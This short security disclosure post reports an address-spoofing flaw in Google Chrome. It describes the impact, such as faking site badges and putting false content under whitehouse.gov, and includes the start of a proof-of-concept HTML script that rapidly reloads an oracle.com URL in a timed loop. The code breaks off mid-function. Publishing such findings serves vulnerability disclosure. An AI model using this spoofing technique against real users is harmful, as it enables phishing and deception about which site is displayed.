Google Chrome Address Spoofing (Request For Comment)

Posted by David Leo on Jun 30

Impact:
The “click to verify” thing is completely broken…
Anyone can be “BBB Accredited Business” etc.
You can make whitehouse.gov display “We love Islamic State” 🙂

Note:
No user interaction on the fake page.

Code:
***** index.html
<script>
function next()
{
w.location.replace('http://www.oracle.com/index.html?'+n);n++;
setTimeout("next();",15);…
